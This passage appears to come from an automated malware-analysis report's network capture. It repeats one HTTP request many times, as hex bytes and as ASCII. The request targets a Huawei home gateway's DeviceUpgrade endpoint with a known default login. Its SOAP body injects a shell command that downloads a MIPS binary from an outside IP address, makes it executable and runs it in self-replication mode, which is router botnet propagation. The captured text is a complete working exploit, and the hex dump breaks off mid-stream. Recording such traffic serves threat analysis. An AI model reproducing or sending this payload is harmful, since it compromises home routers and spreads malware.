3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 